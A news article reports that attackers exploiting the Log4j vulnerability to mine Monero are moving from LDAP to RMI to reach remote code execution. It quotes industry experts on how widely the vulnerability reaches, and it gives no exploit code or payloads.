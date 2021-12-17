Experts say the attack on Log4j could affect millions of devices for YEARS, so attackers are switching tactics to make money.

EXPERTS WARN that threat actors using Apache Log4j to secure Monero mining resources are changing their tactics.

In order to increase their chances of success, some of the attackers exploiting the Apache Log4j vulnerability, which experts predict will last for years, have switched from LDAP to RMI.

Until recently, the majority of attacks on the Java-based logging utility used the LDAP (Lightweight Directory Access Protocol) protocol.

Hackers have discovered that switching to RMI (Remote Method Invocation) allows them to avoid additional security checkpoints in some cases.

Furthermore, because some JVM (Java Virtual Machine) versions have fewer restrictions, RMI can be a faster way to get RCE (remote code execution) than LDAP.

Juniper Labs discovered that some threat actors are attempting to exploit Log4j’s vulnerability using both LDAP and RMI in the hopes of increasing their chances of success.

Some of the attackers appear to be pursuing a single goal: stealing resources in order to mine Monero, a unique type of cryptocurrency.

According to Juniper Labs’ reports, threat actors have described the activity as “not going to harm anyone else.”

Since the vulnerability, which puts systems running Apache Log4j version 2.14.1 or lower at risk, was discovered last week, the cybersecurity community has been on high alert.

“As soon as I saw how you could exploit it, it was horrifying,” said Peter Membrey, ExpressVPN’s chief architect.

“It’s like one of those disaster movies where they discover a nuclear power plant is about to melt down and can’t stop it.”

You know what’s coming, but there’s only so much you can do.”

Experts have been working feverishly to identify vulnerable programs and prevent exploits wherever possible, but the Cybersecurity and Infrastructure Security Agency (CISA) has compiled a list of hundreds of them.

Meanwhile, experts estimate that thousands of applications are affected.

“I ran queries in our database to see who was using Log4j in any of their applications, and the answer was: every single one of them,” Tidelift co-founder Jeremy Katz said.

